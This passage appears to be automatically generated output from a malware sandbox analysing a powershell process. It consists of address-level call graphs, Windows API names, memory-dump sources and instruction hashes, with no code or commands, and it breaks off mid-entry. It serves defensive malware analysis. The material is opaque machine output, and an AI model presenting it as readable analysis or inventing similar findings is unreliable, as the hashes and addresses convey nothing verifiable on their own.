76877->76880 76881 8f6452d 76880->76881 76884 8f626b8 76881->76884 76885 8f626d5 76884->76885 76886 8f626e0 76885->76886 76890 8f620d3 76885->76890 76901 8f620ca 76885->76901 76912 8f61cc8 76885->76912 76886->76871 76892 8f6209f 76890->76892 76893 8f62143 76890->76893 76891 8f623a4 76894 8f623b4 76891->76894 76925 8f607d8 76891->76925 76931 8f60942 76891->76931 76892->76891 76892->76893 76895 8f62254 76892->76895 76893->76885 76894->76885 76895->76893 76898 8f620d3 2 API calls 76895->76898 76899 8f620ca 2 API calls 76895->76899 76900 8f61cc8 2 API calls 76895->76900 76898->76895 76899->76895 76900->76895 76903 8f6209f 76901->76903 76904 8f62143 76901->76904 76902 8f623a4 76905 8f623b4 76902->76905 76907 8f60942 2 API calls 76902->76907 76908 8f607d8 2 API calls 76902->76908 76903->76902 76903->76904 76906 8f62254 76903->76906 76904->76885 76905->76885 76906->76904 76909 8f620d3 2 API calls 76906->76909 76910 8f620ca 2 API calls 76906->76910 76911 8f61cc8 2 API calls 76906->76911 76907->76904 76908->76904 76909->76906 76910->76906 76911->76906 76914 8f61ce9 76912->76914 76913 8f623a4 76916 8f623b4 76913->76916 76919 8f60942 2 API calls 76913->76919 76920 8f607d8 2 API calls 76913->76920 76917 8f62254 76914->76917 76918 8f61d6c 76914->76918 76937 8f635da 76914->76937 76915 8f62143 76915->76885 76916->76885 76917->76915 76922 8f620d3 2 API calls 76917->76922 76923 8f620ca 2 API calls 76917->76923 76924 8f61cc8 2 API calls 76917->76924 76918->76913 76918->76915 76918->76917 76919->76915 76920->76915 76922->76917 76923->76917 76924->76917 76926 8f60807 76925->76926 76927 8f609ee 76926->76927 76928 8f620d3 2 API calls 76926->76928 76929 8f620ca 2 API calls 76926->76929 76930 8f61cc8 2 API calls 76926->76930 76927->76893 76928->76927 76929->76927 76930->76927 76933 8f60842 76931->76933 76932 8f609ee 76932->76893 76933->76931 76933->76932 76934 8f620d3 2 API calls 76933->76934 76935 8f620ca 2 API calls 76933->76935 76936 8f61cc8 2 API calls 76933->76936 76934->76932 76935->76932 76936->76932 76938 8f63606 76937->76938 76941 8f62a90 76938->76941 76944 8f62ab5 76941->76944 76942 8f62abc 76942->76918 76943 8f631e6 76959 8f66119 76943->76959 76963 8f65f70 76943->76963 76944->76942 76944->76943 76950 8f653d0 76944->76950 76956 8f65830 76944->76956 76951 8f65722 SetThreadUILanguage 76950->76951 76954 8f653f9 76950->76954 76953 8f658a1 76951->76953 76953->76943 76954->76951 76967 8f64e40 76954->76967 76957 8f65871 SetThreadUILanguage 76956->76957 76958 8f658a1 76957->76958 76958->76943 76960 8f66127 76959->76960 76962 8f653d0 2 API calls 76960->76962 76961 8f661ff 76961->76961 76962->76961 76964 8f65fac 76963->76964 76966 8f653d0 2 API calls 76964->76966 76965 8f661ff 76965->76965 76966->76965 76968 8f64e6f 76967->76968 76969 8f64ea0 76967->76969 76968->76969 76972 8f648db 76968->76972 76977 8f648f0 76968->76977 76969->76954 76973 8f648dd 76972->76973 76974 8f64917 76973->76974 76975 8f64868 SetThreadUILanguage SetThreadUILanguage 76973->76975 76976 8f64858 SetThreadUILanguage SetThreadUILanguage 76973->76976 76974->76969 76975->76974 76976->76974 76979 8f64868 SetThreadUILanguage SetThreadUILanguage 76977->76979 76980 8f64858 SetThreadUILanguage SetThreadUILanguage 76977->76980 76978 8f64917 76978->76969 76979->76978 76980->76978 76981 85ef8c0 76982 85ef915 CreateFileA 76981->76982 76984 85ef9b8 76982->76984 76985 85efaf0 76986 85efb33 EnumWindows 76985->76986 76987 85efb61 76986->76987 77003 8f62a48 77004 8f62a76 77003->77004 77005 8f62a54 77003->77005 77005->77004 77006 8f62a90 2 API calls 77005->77006 77006->77005 77007 85ed090 77008 85ed0ce 77007->77008 77009 85ed11b 77008->77009 77012 5054cd8 77008->77012 77017 5054cc8 77008->77017 77013 5054ce2 77012->77013 77014 5054d07 77013->77014 77022 5054d80 77013->77022 77027 5054d90 77013->77027 77014->77009 77018 5054cd5 77017->77018 77019 5054d07 77018->77019 77020 5054d80 GetFileAttributesW 77018->77020 77021 5054d90 GetFileAttributesW 77018->77021 77019->77009 77020->77019 77021->77019 77023 5054da3 77022->77023 77032 5054df8 77023->77032 77038 5054e08 77023->77038 77024 5054dc1 77024->77014 77028 5054da3 77027->77028 77030 5054df8 GetFileAttributesW 77028->77030 77031 5054e08 GetFileAttributesW 77028->77031 77029 5054dc1 77029->77014 77030->77029 77031->77029 77034 5054e1d 77032->77034 77033 5054f25 77033->77024 77034->77033 77036 50565c8 GetFileAttributesW 77034->77036 77035 5054ee3 77035->77033 77037 50565c8 GetFileAttributesW 77035->77037 77036->77035 77037->77033 77039 5054e1d 77038->77039 77041 5054f25 77039->77041 77043 50565c8 GetFileAttributesW 77039->77043 77040 5054ee3 77040->77041 77042 50565c8 GetFileAttributesW 77040->77042 77041->77024 77042->77041 77043->77040 77044 87ff8a0 77045 87ff8d3 77044->77045 77046 87ffaa4 77045->77046 77052 87fba1e 77045->77052 77057 87fb6da 77045->77057 77062 87fb6b7 77045->77062 77067 87fb69d 77045->77067 77072 87fbc8c 77045->77072 77053 87fba27 77052->77053 77054 87fbc9d 77053->77054 77077 87fabc0 77053->77077 77083 87fabaf 77053->77083 77054->77046 77059 87fb6b8 77057->77059 77058 87fbc9d 77058->77046 77059->77057 77059->77058 77060 87fabaf GetFileAttributesW 77059->77060 77061 87fabc0 GetFileAttributesW 77059->77061 77060->77059 77061->77059 77063 87fb6b8 77062->77063 77064 87fbc9d 77063->77064 77065 87fabaf GetFileAttributesW 77063->77065 77066 87fabc0 GetFileAttributesW 77063->77066 77064->77046 77065->77063 77066->77063 77069 87fb6aa 77067->77069 77068 87fbc9d 77068->77046 77069->77068 77070 87fabaf GetFileAttributesW 77069->77070 77071 87fabc0 GetFileAttributesW 77069->77071 77070->77069 77071->77069 77073 87fbc9d 77072->77073 77074 87fba66 77072->77074 77073->77046 77074->77072 77075 87fabaf GetFileAttributesW 77074->77075 77076 87fabc0 GetFileAttributesW 77074->77076 77075->77074 77076->77074 77078 87fabe4 77077->77078 77089 87fa850 77078->77089 77100 87fab70 77078->77100 77104 87fa860 77078->77104 77079 87fabf5 77079->77053 77084 87fabe4 77083->77084 77086 87fa860 GetFileAttributesW 77084->77086 77087 87fa850 GetFileAttributesW 77084->77087 77088 87fab70 GetFileAttributesW 77084->77088 77085 87fabf5 77085->77053 77086->77085 77087->77085 77088->77085 77090 87fa88b 77089->77090 77091 87fa8a7 77090->77091 77092 87fab3c 77090->77092 77097 5056a20 GetFileAttributesW 77091->77097 77098 5056a30 GetFileAttributesW 77091->77098 77099 50569f8 GetFileAttributesW 77091->77099 77095 87fa860 GetFileAttributesW 77092->77095 77096 87fa850 GetFileAttributesW 77092->77096 77093 87fab8e 77093->77079 77094 87fa8cf 77094->77079 77095->77093 77096->77093 77097->77094 77098->77094 77099->77094 77101 87fab8e 77100->77101 77102 87fa860 GetFileAttributesW 77100->77102 77103 87fa850 GetFileAttributesW 77100->77103 77101->77079 77102->77101 77103->77101 77105 87fa88b 77104->77105 77106 87fa8a7 77105->77106 77107 87fab3c 77105->77107 77110 5056a20 GetFileAttributesW 77106->77110 77111 5056a30 GetFileAttributesW 77106->77111 77112 50569f8 GetFileAttributesW 77106->77112 77113 87fa860 GetFileAttributesW 77107->77113 77114 87fa850 GetFileAttributesW 77107->77114 77108 87fab8e 77108->77079 77109 87fa8cf 77109->77079 77110->77109 77111->77109 77112->77109 77113->77108 77114->77108

                                                Executed Functions

                                                Function 085E3AF0 Relevance: 2.1, Strings: 1, Instructions: 893COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `Q}l
                                                • API String ID: 0-2844345936
                                                • Opcode ID: dc98661f839159838d9d92d134d39564fa15276b123b2813ec8798ad803ee6df
                                                • Instruction ID: 83ab6ff3e2bc6767a3b99f3a885ac8229c82749190efa9016a385b7d9595bc83
                                                • Opcode Fuzzy Hash: dc98661f839159838d9d92d134d39564fa15276b123b2813ec8798ad803ee6df
                                                • Instruction Fuzzy Hash: C5824A34A00219DFDB18DF64CC94BAEBBB2BF84305F5085A9E909AB391DB35D985CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08636F58 Relevance: 2.0, Strings: 1, Instructions: 768COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1017 8636f58-8636f6a 1018 8636f94-8636f98 1017->1018 1019 8636f6c-8636f8d 1017->1019 1020 8636fa4-8636fb3 1018->1020 1021 8636f9a-8636f9c 1018->1021 1019->1018 1023 8636fb5 1020->1023 1024 8636fbf-8636feb 1020->1024 1021->1020 1023->1024 1027 8636ff1-8636ff7 1024->1027 1028 863720c-8637257 1024->1028 1029 86370c0-86370c4 1027->1029 1030 8636ffd-8637003 1027->1030 1057 8637259 1028->1057 1058 863726d-8637279 1028->1058 1033 86370c6-86370cf 1029->1033 1034 86370e9-86370f2 1029->1034 1030->1028 1032 8637009-8637018 1030->1032 1036 863709f-86370a8 1032->1036 1037 863701e-863702a 1032->1037 1033->1028 1038 86370d5-86370e7 1033->1038 1039 8637117-863711a 1034->1039 1040 86370f4-8637114 1034->1040 1036->1028 1043 86370ae-86370ba 1036->1043 1037->1028 1042 8637030-8637047 1037->1042 1041 863711d-8637123 1038->1041 1039->1041 1040->1039 1041->1028 1045 8637129-863713e 1041->1045 1046 8637053-8637065 1042->1046 1047 8637049 1042->1047 1043->1029 1043->1030 1045->1028 1050 8637144-8637156 1045->1050 1046->1036 1056 8637067-863706d 1046->1056 1047->1046 1050->1028 1052 863715c-8637169 1050->1052 1052->1028 1055 863716f-8637186 1052->1055 1055->1028 1068 863718c-86371a4 1055->1068 1059 8637079-863707f 1056->1059 1060 863706f 1056->1060 1061 863725c-863725e 1057->1061 1062 8637285-86372a1 1058->1062 1063 863727b 1058->1063 1059->1028 1065 8637085-863709c 1059->1065 1060->1059 1066 86372a2-86372df 1061->1066 1067 8637260-863726b 1061->1067 1063->1062 1077 86372e1-86372e4 1066->1077 1078 86372fb-8637307 1066->1078 1067->1058 1067->1061 1068->1028 1069 86371a6-86371b1 1068->1069 1072 86371b3-86371bd 1069->1072 1073 8637202-8637209 1069->1073 1072->1073 1079 86371bf-86371d5 1072->1079 1080 86372e7-86372f9 1077->1080 1081 8637313-8637338 1078->1081 1082 8637309 1078->1082 1084 86371e1-86371fa 1079->1084 1085 86371d7 1079->1085 1080->1078 1080->1080 1089 863733a-8637340 1081->1089 1090 86373ac-86373b2 1081->1090 1082->1081 1084->1073 1085->1084 1089->1090 1094 8637342-8637345 1089->1094 1092 86373b4-86373b7 1090->1092 1093 86373ff-8637419 1090->1093 1095 86373b9-86373c6 1092->1095 1096 863741c-8637455 1092->1096 1094->1096 1097 863734b-8637358 1094->1097 1100 86373f9-86373fd 1095->1100 1101 86373c8-86373e0 1095->1101 1110 863745b-863745d 1096->1110 1111 86374df-8637504 1096->1111 1098 86373a6-86373aa 1097->1098 1099 863735a-8637384 1097->1099 1098->1090 1098->1094 1103 8637390-86373a3 1099->1103 1104 8637386 1099->1104 1100->1092 1100->1093 1101->1096 1106 86373e2-86373f5 1101->1106 1103->1098 1104->1103 1106->1100 1112 8637463-863747a 1110->1112 1113 863750b-8637538 1110->1113 1111->1113 1121 86374a3-86374bc 1112->1121 1122 863747c-86374a1 1112->1122 1130 8637590-8637597 1113->1130 1131 863753a-8637545 1113->1131 1125 86374c7 1121->1125 1126 86374be 1121->1126 1122->1121 1125->1111 1126->1125 1133 86375f1-8637626 1130->1133 1134 8637599-863759e 1130->1134 1135 8637547-863754d 1131->1135 1136 86375a9-86375b3 1131->1136 1137 8637642-8637649 1133->1137 1138 8637628-8637640 1133->1138 1139 86375a0-86375a4 1134->1139 1140 86375b5-86375be call 863788c 1134->1140 1141 8637557 1135->1141 1142 863754f-8637556 1135->1142 1136->1140 1144 86375a5-86375a8 1136->1144 1138->1137 1152 863764c-863768c 1138->1152 1139->1144 1148 86375c4-86375c8 1140->1148 1212 8637558 call 86374e0 1141->1212 1213 8637558 call 8637560 1141->1213 1214 8637558 call 8637570 1141->1214 1215 8637558 call 8636f49 1141->1215 1216 8637558 call 8636f58 1141->1216 1217 8637558 call 86374de 1141->1217 1142->1141 1144->1136 1146 863755e-863755f 1149 86375e5-86375ec 1148->1149 1150 86375ca-86375db 1148->1150 1150->1149 1158 86376bf-86376c9 1152->1158 1159 863768e-8637695 1152->1159 1163 86376cc-863770b 1158->1163 1159->1158 1160 8637697-86376bd 1159->1160 1160->1163 1171 863777f-863787e 1163->1171 1172 863770d-8637723 1163->1172 1174 8637880 1171->1174 1175 8637889 1171->1175 1177 8637747-863774b 1172->1177 1178 8637725-863772a 1172->1178 1174->1175 1179 863774d-863775f 1177->1179 1180 86377bc-86377c0 1177->1180 1181 8637738 1178->1181 1182 863772c-8637736 1178->1182 1188 8637761-863776a 1179->1188 1189 8637797-86377b5 1179->1189 1183 86377c2-863780a 1180->1183 1184 863780f-863781c 1180->1184 1185 863773d-863773f 1181->1185 1182->1185 1192 8637772-863777d 1183->1192 1184->1192 1193 8637822-8637875 1184->1193 1185->1177 1187 8637741-8637744 1185->1187 1187->1177 1188->1192 1189->1180 1192->1171 1192->1172 1193->1192 1212->1146 1213->1146 1214->1146 1215->1146 1216->1146 1217->1146
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d
                                                • API String ID: 0-2564639436
                                                • Opcode ID: 4d5eb11134b80ff3ea0d13c8a80643d67f1e42aa93ad54cfb953c1d16db6073a
                                                • Instruction ID: 01eba61d8eec30905c8312de7b4b645af362d25e1c61c93179a92b546eac4cb9
                                                • Opcode Fuzzy Hash: 4d5eb11134b80ff3ea0d13c8a80643d67f1e42aa93ad54cfb953c1d16db6073a
                                                • Instruction Fuzzy Hash: 6852BFB4A00215CFD714DF68C484AAABBF2FF88311F168569E456DB7A1DB30EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863309E Relevance: 1.7, Strings: 1, Instructions: 496COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1456 863309e-86332f2 1493 86332f9-863330c 1456->1493 1495 8633312-86334b1 1493->1495 1522 86334ba-86334c2 1495->1522 1523 86334ca-8633931 1522->1523
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'}l
                                                • API String ID: 0-3181038151
                                                • Opcode ID: 69513ce6589b69950b9959ce768f98176739518bd844d8e4c23904b7ca943a14
                                                • Instruction ID: 87a93b3e6f10f36a23fa4807eb230d6255b87ad451b89f235ebb97cfed9c476f
                                                • Opcode Fuzzy Hash: 69513ce6589b69950b9959ce768f98176739518bd844d8e4c23904b7ca943a14
                                                • Instruction Fuzzy Hash: AE22E874E042488FCB54DFA4C8547EEBBB2EF88304F1249B9D109AF654DB399E858F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086330B0 Relevance: 1.7, Strings: 1, Instructions: 491COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1590 86330b0-86334c2 1657 86334ca-8633931 1590->1657
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'}l
                                                • API String ID: 0-3181038151
                                                • Opcode ID: ba8da603a45f3e7d160f9ebdbe501f2e825a40cc755a88d51373de8b04e01c46
                                                • Instruction ID: 05f595334f3f6d11b21d04bd392949f33f8beeae789b6f53b1373fac45956d30
                                                • Opcode Fuzzy Hash: ba8da603a45f3e7d160f9ebdbe501f2e825a40cc755a88d51373de8b04e01c46
                                                • Instruction Fuzzy Hash: E422E974E042488FCB54DFA4C8547EEBBB2EF88304F1249B9D109AF654DB399E858F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08745AE4 Relevance: 1.6, APIs: 1, Instructions: 128pipeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08746398
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateNamedPipe
                                                • String ID:
                                                • API String ID: 2489174969-0
                                                • Opcode ID: ba62013e83eb34b64a756667b9216c0fcae11c8c66cba7708784a907959b12bc
                                                • Instruction ID: bf5f50ee20d2d7427b9c5e9aba2e76bccde1cada7baa1543f8eb530794674e63
                                                • Opcode Fuzzy Hash: ba62013e83eb34b64a756667b9216c0fcae11c8c66cba7708784a907959b12bc
                                                • Instruction Fuzzy Hash: 3051F5B1D00348EFDB14CFA9C884BDEBBF6AF49304F24852AE408AB251D7749985CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F9140 Relevance: 1.0, Instructions: 1011COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b318a7e0078134b74fa467f521a2d80048bddccdeec6280b51c9bfbe70945e67
                                                • Instruction ID: ffdb09111dab7a1768745d7e2293bad1d677082687a759647785d6ee0a24ea9c
                                                • Opcode Fuzzy Hash: b318a7e0078134b74fa467f521a2d80048bddccdeec6280b51c9bfbe70945e67
                                                • Instruction Fuzzy Hash: CC829934A002058FCB14DFA5C454BAEBBF6EF88305F158469DA06EB396DB35DC46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FF298 Relevance: .9, Instructions: 853COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59993867f9280c0633e26e4caaf021f07b17a433eaeea1158e2e3476db5e704d
                                                • Instruction ID: c55471d8b9f504f1ef4b3d8295c82fb2d6fb505762126995662e27219df969e1
                                                • Opcode Fuzzy Hash: 59993867f9280c0633e26e4caaf021f07b17a433eaeea1158e2e3476db5e704d
                                                • Instruction Fuzzy Hash: 0E726E34A00204DFCB14DFA5D494AAEB7F2EF88315F158469E906AB365DF34ED46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 085E5140 Relevance: .8, Instructions: 827COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a6e14257dc6057391ad82d64a1210c5bf65bc193b99e3ace4d1a7f59d2e2e9f
                                                • Instruction ID: 91cf2c5fae944ad5e2df08cea4e642f14206926b382425023273989884cd8804
                                                • Opcode Fuzzy Hash: 3a6e14257dc6057391ad82d64a1210c5bf65bc193b99e3ace4d1a7f59d2e2e9f
                                                • Instruction Fuzzy Hash: 1B626F34A006098FCB14DF68D884A9EB7F3FF84305F158969E506AB361EB74AD46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08747888 Relevance: .8, Instructions: 808COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ee955736b4a1a8294d270d972aea40296c362d5a54173417c1183e0474a62ac
                                                • Instruction ID: f58004b275ffd630edffd73486f036c1c3ebd3083c7ae80229321ba793262d31
                                                • Opcode Fuzzy Hash: 0ee955736b4a1a8294d270d972aea40296c362d5a54173417c1183e0474a62ac
                                                • Instruction Fuzzy Hash: CE729034A002198FDB14DBA4C850BEEB7B6EF88300F1485AAD509BB395DF759D85CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08F61CC8 Relevance: .6, Instructions: 609COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2679d0512871f551ccc2d83c9250359a4ff4ccdf111bdb277542bdb48fd46c4
                                                • Instruction ID: 9a929c48172e30cde2d1ceeedf330aaa80ca48f2f52c6d9f006045b1b6b377a9
                                                • Opcode Fuzzy Hash: d2679d0512871f551ccc2d83c9250359a4ff4ccdf111bdb277542bdb48fd46c4
                                                • Instruction Fuzzy Hash: EA328D75E00204CFDB14DBB4C558AAEBBF2EF88226F15866DD8069B351DB34EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08F60942 Relevance: .6, Instructions: 574COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 902946d3266806479a7ed84c22d2f9828f020bc55f4327cab4c6c690606d1745
                                                • Instruction ID: 941f3db6ddbb0f4545b3ca25865cabd5a63ccf9c0a81216b6087b34d5fbd8245
                                                • Opcode Fuzzy Hash: 902946d3266806479a7ed84c22d2f9828f020bc55f4327cab4c6c690606d1745
                                                • Instruction Fuzzy Hash: 0C326634E00218CFDB24DB78C894BADB7B2AF88215F2585A9D40AEB355DF349D85CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08F62A90 Relevance: .5, Instructions: 454COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48b0464c0f58cfc6e7d370dba21cfbf0397baff5c1c53fa26002b39f3f1c73f0
                                                • Instruction ID: b124f3420d62184ded50108d08af284f662807cd2241aaf45e48e64b62a3b924
                                                • Opcode Fuzzy Hash: 48b0464c0f58cfc6e7d370dba21cfbf0397baff5c1c53fa26002b39f3f1c73f0
                                                • Instruction Fuzzy Hash: 78025A75B002049FDB18DB74E598AAEBBB2EF88316F15846DE406DB390DF359C45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 085E2772 Relevance: .4, Instructions: 447COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d96c30146de76b3a8988e114b12c972ceddd88ebc34bb5a94527bc30a547646e
                                                • Instruction ID: dd04ce4856c7a47c7b9327da6bd6362af2016c3640a7602516c475ecf85b04eb
                                                • Opcode Fuzzy Hash: d96c30146de76b3a8988e114b12c972ceddd88ebc34bb5a94527bc30a547646e
                                                • Instruction Fuzzy Hash: 46024E34B002059FDB18DFB4C894AAEBBBABF88205F548469F902DB395DB75DC46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086758E0 Relevance: .3, Instructions: 321COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 675bdeaca9dbcbe50c10152f8c40a2dff91b8a75ea62c903b7171747d80e6f42
                                                • Instruction ID: 2482016f1c6ae002106529aa47f985466c8766232cf419880626d1db94ba9f0e
                                                • Opcode Fuzzy Hash: 675bdeaca9dbcbe50c10152f8c40a2dff91b8a75ea62c903b7171747d80e6f42
                                                • Instruction Fuzzy Hash: DAB1AD35B003009FDB259B79886866E7BA6EB89212B1584AED407CF795DF35DC02CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08633950 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 8633950-86339d0 300 86339d2 294->300 301 86339d7-8633a11 294->301 300->301 306 8633a13-8633a26 301->306 307 8633a2d-8633a34 301->307 306->307 308 8633a40-8633a46 307->308 309 8633a36-8633a39 307->309 352 8633a49 call 8632e70 308->352 353 8633a49 call 8632e5f 308->353 309->308 311 8633a4f-8633a74 314 8633a76 311->314 315 8633a7d-8633aae 311->315 314->315 319 8633ab0 315->319 320 8633ab7-8633b85 315->320 319->320 335 8633b87-8633b8d 320->335 336 8633baa-8633bbf 320->336 337 8633d23-8633d2d 335->337 338 8633b93-8633ba3 335->338 346 8633bc7 336->346 339 8633d46-8633d4d 337->339 340 8633d2f-8633d3e 337->340 345 8633ba5 338->345 343 8633d71-8633d8c 339->343 344 8633d4f-8633d69 339->344 340->339 348 8633d96 343->348 349 8633d8e 343->349 344->343 345->337 346->337 351 8633d97 348->351 349->348 351->351 352->311 353->311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SN$kH$kN$M
                                                • API String ID: 0-872941900
                                                • Opcode ID: ba9e588bedd0e277ba30ea5b8ed6e41b3b5db84f81343b017d0231b1ba752875
                                                • Instruction ID: 155d0cdcc584e5346737b5f61827b26764b88289646e6d805f7bb14b9175c3f2
                                                • Opcode Fuzzy Hash: ba9e588bedd0e277ba30ea5b8ed6e41b3b5db84f81343b017d0231b1ba752875
                                                • Instruction Fuzzy Hash: CE918C34A042059FC714DF68D590AAEB7F2EF88215F56C968E40AAF751CB39EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08633940 Relevance: 5.2, Strings: 4, Instructions: 218COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 354 8633940-86339d0 360 86339d2 354->360 361 86339d7-8633a11 354->361 360->361 366 8633a13-8633a26 361->366 367 8633a2d-8633a34 361->367 366->367 368 8633a40-8633a46 367->368 369 8633a36-8633a39 367->369 412 8633a49 call 8632e70 368->412 413 8633a49 call 8632e5f 368->413 369->368 371 8633a4f-8633a74 374 8633a76 371->374 375 8633a7d-8633aae 371->375 374->375 379 8633ab0 375->379 380 8633ab7-8633b85 375->380 379->380 395 8633b87-8633b8d 380->395 396 8633baa-8633bbf 380->396 397 8633d23-8633d2d 395->397 398 8633b93-8633ba3 395->398 406 8633bc7 396->406 399 8633d46-8633d4d 397->399 400 8633d2f-8633d3e 397->400 405 8633ba5 398->405 403 8633d71-8633d8c 399->403 404 8633d4f-8633d69 399->404 400->399 408 8633d96 403->408 409 8633d8e 403->409 404->403 405->397 406->397 411 8633d97 408->411 409->408 411->411 412->371 413->371
                                                Strings
                                                Memory Dump Source
